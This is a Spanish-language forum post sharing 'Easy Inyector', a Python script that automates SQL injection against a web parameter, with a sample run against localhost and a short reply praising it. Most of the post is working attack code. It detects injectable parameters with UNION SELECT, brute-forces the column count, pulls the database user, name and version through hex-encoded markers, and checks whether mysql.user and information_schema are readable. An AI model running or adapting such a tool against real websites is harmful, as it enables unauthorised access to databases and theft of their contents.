[Python] Easy Inyector By Doddy H

Iniciado por BigBear, 7 Octubre 2011, 01:33 AM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Bueno esta es la primera version de este simple programa que hice en perl , en
la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.

Esta cosa busca:

* Vulnerabilidad (obvio)
* Limite de columnas
* Informacion sobre la base de datos
* Automaticamente buscar el numero que permite mostrar informacion
* Verifica existencia de mysql.user y information.schema.tables

Código (python) [Seleccionar]

#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010

import os,sys,urllib2,re


def clean():
if sys.platform=="win32":
 os.system("cls")
else:
 os.system("clear")


def header() :
print "\n--== Easy Inyector ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
sys.exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()

def bypass(bypass):
if bypass == "--":
 return("+","--")
elif bypass == "/*":
 return("/**/","/*")
else:
 return("+","--")

def more(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Searching more data\n"
web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
code0 = toma(web1)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
 datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
 datar = re.split("K0BRA",datax[0])
 print "[+] Username :",datar[1]
 print "[+] Database :",datar[2]
 print "[+] Version :",datar[3],"\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
  print "[+] mysql.user : on"
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
  print "[+] information_schema.tables : on"

def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "concat(0x4b30425241,1,0x4b30425241)"
for te in range(2,30):
 number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
 if (re.findall("K0BRA(.*?)K0BRA",code)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code)
  print "[+] Column length :",te
  print "[+] Numbers",numbers,"print data"
  sql = ""
  tex = te + 1
  for sqlix in range(2,tex):
   sql = str(sql)+","+str(sqlix)
   sqli  = str(1)+sql
  sqla = re.sub(numbers[0],"hackman",sqli)
  more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  print "\n[+] Scan Finished\n"
  sys.exit(1)
print "[-] Length dont found\n"
 
   
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Testing vulnerability"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
 print "[+] SQLI Detected"
 findlength(web,passx)
else:
 print "[-] Not Vulnerable"
 copyright()


header()

if len(sys.argv) != 2 :
show()

else :
try:
 scan(sys.argv[1],"--")
except:
 copyright()


#The End




Ejemplo de uso



C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010





HIRONAKAMURA

 ;-)
Muy buen aporte para los que les (nos) gusta programar en Python
Todos son buenos para encontrar problemas, muy pocos para hallar soluciones.